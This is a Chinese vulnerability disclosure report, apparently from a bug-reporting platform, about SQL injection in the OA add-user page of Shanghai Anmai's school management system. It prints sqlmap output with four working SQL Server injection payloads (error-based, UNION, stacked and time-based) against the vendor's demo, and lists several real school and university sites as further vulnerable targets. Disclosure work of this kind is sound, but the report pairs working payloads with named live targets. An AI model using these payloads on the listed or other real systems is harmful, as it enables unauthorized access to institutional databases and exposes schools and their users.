### 简要描述:
前台走一走
### 详细说明:
问题厂商:上海安脉计算机科技有限公司
谷歌百度:版权所有:上海安脉计算机科技有限公司
大量学校使用该系统 管理平台没发现漏洞,但是这套系统附带一套oa系统
/anmai/oa/adduser.aspx
在密码出现sql注入 只能手工不好利用
[<img src="https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/191116461c4d6afe69e6eb2112b1e35917432117.jpg)
[<img src="https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1911165466501d749c7c4e82fc7ad2797fec7ccf.jpg)
但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 (id存在注入)
以该公司demo为例
http://www.anmai.net/anmai/oa/adduser.aspx?id=1
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113))) AND 'HCnH'='HCnH
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT 67,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(76)+CHAR(90)+CHAR(67)+CHAR(75)+CHAR(67)+CHAR(72)+CHAR(80)+CHAR(66)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113),67,67,67,67,67,67--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1' WAITFOR DELAY '0:0:5'--
---
[11:10:22] [INFO] testing Microsoft SQL Server
[11:10:22] [INFO] confirming Microsoft SQL Server
[11:10:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[11:10:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[11:10:26] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.anmai.net'
### 漏洞证明:
其他例供证明:
http://bssyxxgl.eicbs.com/anmai/oa/addUser.aspx?id=1
http://www.gxbyzx.cn:88/ANMAI/oa/adduser.aspx?id=1
http://www.aqyz.net/anmai/oa/adduser.aspx?id=1
http://ps.imau.edu.cn/anmai/oa/addUser.aspx?id=1
暂无评论